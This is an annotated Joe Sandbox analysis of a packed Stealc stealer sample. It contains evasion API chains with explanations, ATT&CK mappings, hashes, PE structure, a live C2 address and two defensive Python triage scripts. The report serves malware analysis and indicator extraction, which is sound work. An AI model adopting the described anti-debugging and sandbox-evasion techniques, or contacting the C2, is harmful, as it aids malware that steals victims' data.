Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003C6390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003C6390 mov eax, dword ptr fs:[00000030h] 0_2_003C6390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003C2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003C2A40
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard
Note: HideFromDebugger is NtSetInformationThread(ThreadHideFromDebugger), which stops a user-mode debugger from receiving events for that thread; DebugPort is NtQueryInformationProcess(ProcessDebugPort). NTICE, SICE and SIWVID are the device names of the SoftICE kernel debugger, and regmonclass, filemonclass and procmon_window_class are the window classes of Sysinternals Regmon, Filemon and Process Monitor. The fs:[30h] read fetches the 32-bit PEB (BeingDebugged and NtGlobalFlag live there), and 0x100 among the VirtualProtect arguments is PAGE_GUARD, matching the page guard event: the first touch of a guard page raises STATUS_GUARD_PAGE_VIOLATION, and code that expects to catch it itself can tell when a debugger consumes the exception instead. Each check is cheap to defeat (rename the tool window, patch the query results, use a kernel debugger), but their number is consistent with the 'Found evaded block containing many API calls' signature and the 124 non-executed functions reported below.

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 1228, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003C4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_003C4610
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003C46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_003C46A0
Source: file.exe Binary or memory string: Program Manager
Source: file.exe, 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_003C2D60
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003C1B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_003C1B20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003C2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003C2A40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003C2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_003C2C10
Note: both Toolhelp32 walks compare each process name with StrCmpCA; the second one opens and terminates the matching process, which is the evidence behind the 'Searches for specific processes' and 'Tries to detect process monitoring tools' signatures. 0_2_003C1B20 reads the clock, parses a date with sscanf, converts both values to FILETIME and can call ExitProcess, which reads as a date-based execution gate; together with the GetUserDefaultLangID/ExitProcess chain in 0_2_003C1BF0 it is a likely reason the run's dynamic coverage is incomplete. Keyboard layouts, locale, time zone, volume serial and user name are the fields a stealer collects for its victim fingerprint before it talks to the C2.
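The evidence lines in this section and the ones above it are one API chain per function, and reading a few hundred of them by eye is how things get missed. The following Python is an added example written for this page, not Joe Sandbox code: it parses lines in the report's own format, counts the APIs in each chain and applies a small rule table to tag file harvesting, process enumeration and termination, runtime API resolution, PEB access, locale and date gates and fingerprint collection. The tag names and the rules are this example's assumptions; SAMPLE_LINES are constructed from the report's lines, with the long lstrcpy/lstrcat runs of the file-enumeration chains abridged.

```python
"""Tag Joe Sandbox "Code function" evidence lines with behaviour labels.

Added example for this report page; it is not Joe Sandbox code.  The rule
table and tag names are this example's own assumptions.  SAMPLE_LINES are
constructed from the report's evidence lines, with the long lstrcpy/lstrcat
runs in the file-enumeration chains abridged.
"""
import re
from collections import Counter, defaultdict

SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B18A0 lstrcpy,lstrlen,lstrcat,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,CopyFileA,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003B18A0",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_003C1BF0",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A4A60 VirtualProtect 00000000,00000004,00000100,?0_2_003A4A60",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,0_2_003C6390",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C6390 mov eax, dword ptr fs:[00000030h]0_2_003C6390",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003C2A40",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_003C4610",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_003C46A0",
    r"Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_003C2D60",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C1B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_003C1B20",
]

FUNC_ID = r"\d+_\d+_[0-9A-Fa-f]{6,8}"
# The report prints the function id before the chain, after it, or both.
LINE_RE = re.compile(
    r"Code function:\s*(?:(?P<lead>" + FUNC_ID + r")\s+)?"
    r"(?P<body>.*?)(?P<trail>" + FUNC_ID + r")?\s*$"
)
API_TOKEN = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")   # skips hex arguments such as 00000100
LOCALE_APIS = {"GetUserDefaultLangID", "GetSystemDefaultLangID",
               "GetLocaleInfoA", "GetKeyboardLayoutList"}


def parse_line(line):
    """Return (function_id, Counter of API names, raw chain text), or None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    func_id = m.group("lead") or m.group("trail")
    if func_id is None:
        return None
    body = m.group("body")
    return func_id, Counter(API_TOKEN.findall(body)), body


def tag_chain(apis, raw):
    """Apply the (assumed) rule table to one chain; returns a set of tags."""
    def has(name):
        return apis[name] > 0
    tags = set()
    if has("FindFirstFileA"):                        # directory walk
        tags.add("file_enum")
        if has("CopyFileA") or has("DeleteFileA"):   # walk plus stage/remove = harvest
            tags.add("file_harvest")
    if has("CreateToolhelp32Snapshot") and (has("Process32First") or has("Process32Next")):
        tags.add("process_enum")
        if has("TerminateProcess"):
            tags.add("process_kill")
    if apis["GetProcAddress"] >= 5:                  # imports resolved at run time
        tags.add("dynamic_api_resolution")
    if re.search(r"fs:\[0*30h\]", raw):              # 32-bit PEB read
        tags.add("peb_access")
    if any(has(a) for a in LOCALE_APIS):
        tags.add("locale_query")
        if has("ExitProcess"):                       # query followed by exit = evasive gate
            tags.add("locale_gate")
    if has("OpenEventA") and has("CreateEventA"):    # named-event single-instance check
        tags.add("single_instance_event")
    if has("GetUserNameA"):
        tags.add("user_discovery")
    if has("GetSystemTime") or has("GetTimeZoneInformation"):
        tags.add("time_discovery")
    return tags


def classify_report(lines):
    """Map function id -> sorted tags, merging lines that share an id."""
    tags_by_func = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        func_id, apis, body = parsed
        tags_by_func[func_id] |= tag_chain(apis, body)
    return {f: sorted(t) for f, t in tags_by_func.items()}


def tag_histogram(lines):
    """How many functions carry each tag; a one-line triage summary."""
    return Counter(t for tags in classify_report(lines).values() for t in tags)


if __name__ == "__main__":
    for func, tags in sorted(classify_report(SAMPLE_LINES).items()):
        print(func, ", ".join(tags) or "-")
    print(dict(tag_histogram(SAMPLE_LINES)))
```

Feeding the full report into classify_report gives one tag list per function address, which is easier to compare across samples from the same C2 than the raw chains; the thresholds (five GetProcAddress calls, walk plus CopyFileA) are deliberately loose and should be tuned on a corpus before they are used to rank anything.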

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000002.1519984196.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1459234252.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 1228, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match File source: the same five sources as under Stealing of Sensitive Information (the three memory dumps, the process memory space of PID 1228 and dump.pcap)
Note: every Yara hit is on a memory dump or on the capture, none on file.exe as it sits on disk. The Stealc payload only becomes visible after the protector has unpacked it (the 'Detected unpacking (changes PE section rights)' signature), so file-based Yara or hash matching for this family has to run on memory dumps or on the unpacked image, not on the delivered binary.
MITRE ATT&CK techniques matched by the signatures (number of matching signatures in parentheses; the remaining cells of the report's matrix are unmatched template entries and are omitted)

Execution: Command and Scripting Interpreter (2), Native API (13)
Persistence: Create Account (1), DLL Side-Loading (1)
Privilege Escalation: Process Injection (11), DLL Side-Loading (1)
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12)
Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact: no signature matches

The counts are signature hits, not confirmed events: Process Injection (11) stands next to 'Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected' above, and the 641 Security Software Discovery hits count individual window, device and process name checks rather than distinct techniques.
Antivirus detection: submitted sample
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No antivirus matches for dropped files, unpacked PE files or contacted domains.

Antivirus detection: URLs
Source | Detection | Scanner | Label
http://185.215.113.206/c4becf79229cb002.phpktop | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.php/ug | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpaoNw | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpmoZw | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpyo&w | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.php/Pg | 100% | Avira URL Cloud | malware
Contacted domains: none.

Contacted URLs
Name | Malicious | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | high
http://185.215.113.206/ | false | high

URLs found in process memory
Name | Source | Malicious | Antivirus detection | Reputation
http://185.215.113.206/c4becf79229cb002.phpaoNw | file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1519984196.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/L | file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpktop | file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/ws | file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php/ug | file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.phpyo&w | file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.phpmoZw | file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.php/Pg | file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
Note: the suffixes ktop, aoNw, moZw, yo&w, /ug and /Pg are almost certainly not URL components but whatever bytes followed the URL in the heap buffer the string scanner read, which is why they vary while the host and path do not. The actionable IOCs are the host 185.215.113.206 and the path /c4becf79229cb002.php, which is also the C2 from the extracted configuration and the URL the Yara rule matched in dump.pcap. The 'Malicious: false' and 'Reputation: high' values in this table come from the URL reputation lookup, not from the sandbox verdict; the host itself is marked malicious in the IP table below.

Contacted IPs
IP | Domain | Country | ASN | ASN name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
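Turning a memory-string table like the one above into a clean indicator is a routine chore, and doing it by hand is where stray suffixes end up in blocklists. The following Python is an added example written for this page, not Joe Sandbox code: it groups the strings by host and picks, per host, the longest string that is a prefix of at least half of that host's strings. A URL read out of memory together with the bytes that followed it is a superstring of the real URL, so the real URL wins the vote and the junk variants do not. MEMORY_URLS is constructed from the URL tables above; the heuristic and the function names are this example's own assumptions.

```python
"""Collapse noisy sandbox memory-string URLs into one canonical IOC per host.

Added example for this report page, not Joe Sandbox code.  MEMORY_URLS are
the URL strings from the report's URL tables; the prefix-vote heuristic and
the function names are this example's own assumptions.
"""
from collections import defaultdict
from urllib.parse import urlsplit

MEMORY_URLS = [
    "http://185.215.113.206/c4becf79229cb002.phpktop",
    "http://185.215.113.206/c4becf79229cb002.php/ug",
    "http://185.215.113.206/c4becf79229cb002.phpaoNw",
    "http://185.215.113.206/c4becf79229cb002.phpmoZw",
    "http://185.215.113.206/c4becf79229cb002.phpyo&w",
    "http://185.215.113.206/c4becf79229cb002.php/Pg",
    "http://185.215.113.206/c4becf79229cb002.php",
    "http://185.215.113.206/",
    "http://185.215.113.206",
    "http://185.215.113.206/L",
    "http://185.215.113.206/ws",
]


def canonical_urls(urls, min_support=0.5):
    """Per host, choose the longest observed string that is a prefix of at
    least `min_support` of that host's strings.  Returns
    {host: (canonical_url, [the other strings seen for that host])}."""
    by_host = defaultdict(list)
    for u in urls:
        by_host[urlsplit(u).netloc].append(u)
    result = {}
    for host, group in by_host.items():
        chosen = None
        # Longest candidates first, so the most specific string that still
        # has enough support wins; ties are broken alphabetically.
        for cand in sorted(set(group), key=lambda s: (-len(s), s)):
            support = sum(1 for u in group if u.startswith(cand)) / len(group)
            if support >= min_support:
                chosen = cand
                break
        result[host] = (chosen, sorted(u for u in set(group) if u != chosen))
    return result


def artifact_suffixes(canonical, variants):
    """The bytes that followed the canonical string in each memory hit.
    Short mixed-case runs such as 'ktop' or 'moZw' are adjacent-buffer noise;
    a suffix that looks like a real path or query deserves a check in the pcap."""
    return sorted(v[len(canonical):] for v in variants
                  if v != canonical and v.startswith(canonical))


if __name__ == "__main__":
    for host, (canon, others) in canonical_urls(MEMORY_URLS).items():
        print(f"{host}: {canon}")
        print("  suffixes seen:", artifact_suffixes(canon, others))
```

The vote threshold matters: with seven of eleven strings sharing the .php prefix it is chosen, while the bare host and the /L and /ws fragments (fewer than half of the strings extend them at that length) are reported as leftovers. Whatever this produces should still be confirmed against the capture, because a genuine second path would be demoted to a leftover just the same.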
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1559010
Start date and time: 2024-11-20 03:19:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 79%
• Number of executed functions: 19
• Number of non-executed functions: 124
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big: too many NtQueryValueKey calls found
Simulations: none
Coverage caveat: 124 of the 143 functions found were never executed, hypervisor-based inspection was off and the cookbook reports missing behavior information, so the absence of a behaviour in this report is not evidence that the sample lacks it. The verdict rests on the Yara matches, the extracted configuration and the network traffic, not on a complete execution trace.
Context: IP 185.215.113.206 (other samples in the Joe Sandbox corpus that contacted this address)
Sample | Detection | Threat name | Context
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | LummaC, Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | LummaC, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | LummaC, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
(the SHA256 values and report links of these rows are not preserved in this export)

Context: ASN WHOLESALECONNECTIONSNL (other samples that contacted this network)
Sample | Detection | Threat name | IP
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 185.215.113.16
file.exe | malicious | LummaC, Amadey, Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC, Stealc, Vidar | 185.215.113.16
No context for the remaining context categories.
No created / dropped files found
Note: all ten earlier samples seen on this IP used the same path, c4becf79229cb002.php, so the path is a stable pivot rather than a per-build value, and the neighbouring address 185.215.113.16 in the same ASN serves LummaC, Amadey and Cryptbot. Both addresses belong to one shared loader and stealer hosting set and are worth blocking together.
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.944327673641293
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'801'728 bytes
MD5: af00fae5bf606001c0c6ef0b98fb54d0
SHA1: a24fe73ec0b2d0190d3f6f068ca3c13a6cde4fd3
SHA256: 8b1fbd75e6fcdf963260148537cae0d876130656c343518a5d7623937d4f0881
SHA512: e08d6691ed7092e2f569391ef89c6b3528630ff449372b064e06ebde2e7de482517e7407c81ce75a190d74936c64a0c31f5acc23efeffe6f54622184f780a5bc
SSDEEP: 24576:fVIhhuGqyQIrSITgOIubNQb6KAnOMK0HKKEfbULhQmo1936905EnoK5RLSEzqt9v:uh8IrZhrO2KAnOMg5fbULhQmo19Cnqb
TLSH: 17853355DEC666E0E67E86F9770C87843B59239FAEFAC1F5FEE002281C8205F5919C60
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
Icon Hash: 00928e8e8686b000
Entrypoint: 0xa92000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks: none
CLR (.Net) Version: none
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Note: an 8-bit entropy of 7.94 (8.0 is the maximum) and an entry point inside a section named .taggant rather than .text are what the 'Entry point lies outside standard sections' and 'PE file contains section with special chars' signatures describe; together with the Oreans/WinLicense strings found in memory they point to a commercial protector around the stealer. Static signatures, the import hash and TrID therefore describe the wrapper, not Stealc, which is consistent with Avira's generic TR/Crypt.TPM.Gen label. NX_COMPAT is not among the DLL characteristics, and the compile timestamp (9 November 2024) is eleven days before the analysis date, which fits a freshly built sample rather than a forged timestamp, although the protector could have rewritten it.
Instruction (disassembly at the entry point, 0xa92000 in section .taggant)
jmp 00007F292CE9C5DAh
subps xmm3, dqword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
(the listing continues with add byte ptr [eax], al repeated)
Note: the unconditional jmp is the only instruction at the entry point that executes; it transfers control into the protector's stub. Everything after it is the disassembler decoding bytes that are never reached as code, and add byte ptr [eax], al is how a 00 00 byte pair decodes, so the tail of the listing is zero padding rather than instructions.
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1ac | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        (unnamed) | 0x1000 | 0x249000 | 0x16200 | d6f13f17e6a79c73421c743cdce28c00 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0x24a000 | 0x1ac | 0x200 | 39d4613d55d52d41d5360c194a837365 | False | 0.578125 | data | 4.541392078148798 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        (unnamed) | 0x24c000 | 0x2a7000 | 0x200 | 54346984e78ef8836001674a722ce650 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        bvkzsckp | 0x4f3000 | 0x19e000 | 0x19e000 | 6960613a441b5f415526ca56ddf62bca | False | 0.9949526579483695 | data | 7.954205119392446 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        wpxlzhew | 0x691000 | 0x1000 | 0x400 | 13a437cba064864885176c8084354487 | False | 0.736328125 | data | 5.8538902746469 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant | 0x692000 | 0x3000 | 0x2200 | 6c5ba68e051dd9e3cf504a5b560b9c4c | False | 0.006433823529411764 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_MANIFEST | 0x690eac | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
                        DLL | Import
                        kernel32.dll | lstrcpy
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2024-11-20T03:20:38.086111+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49705 | 185.215.113.206 | 80 | TCP
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Nov 20, 2024 03:20:37.051583052 CET | 49705 | 80 | 192.168.2.7 | 185.215.113.206
                        Nov 20, 2024 03:20:37.139990091 CET | 80 | 49705 | 185.215.113.206 | 192.168.2.7
                        Nov 20, 2024 03:20:37.140111923 CET | 49705 | 80 | 192.168.2.7 | 185.215.113.206
                        Nov 20, 2024 03:20:37.141319990 CET | 49705 | 80 | 192.168.2.7 | 185.215.113.206
                        Nov 20, 2024 03:20:37.146173000 CET | 80 | 49705 | 185.215.113.206 | 192.168.2.7
                        Nov 20, 2024 03:20:37.857381105 CET | 80 | 49705 | 185.215.113.206 | 192.168.2.7
                        Nov 20, 2024 03:20:37.857470036 CET | 49705 | 80 | 192.168.2.7 | 185.215.113.206
                        Nov 20, 2024 03:20:37.859996080 CET | 49705 | 80 | 192.168.2.7 | 185.215.113.206
                        Nov 20, 2024 03:20:37.864850998 CET | 80 | 49705 | 185.215.113.206 | 192.168.2.7
                        Nov 20, 2024 03:20:38.086021900 CET | 80 | 49705 | 185.215.113.206 | 192.168.2.7
                        Nov 20, 2024 03:20:38.086111069 CET | 49705 | 80 | 192.168.2.7 | 185.215.113.206
                        Nov 20, 2024 03:20:41.176920891 CET | 49705 | 80 | 192.168.2.7 | 185.215.113.206
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Nov 20, 2024 03:20:52.066898108 CET | 53 | 49540 | 1.1.1.1 | 192.168.2.7
                        • 185.215.113.206
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.7 | 49705 | 185.215.113.206 | 80 | 1228 | C:\Users\user\Desktop\file.exe
                        Timestamp | Bytes transferred | Direction | Data
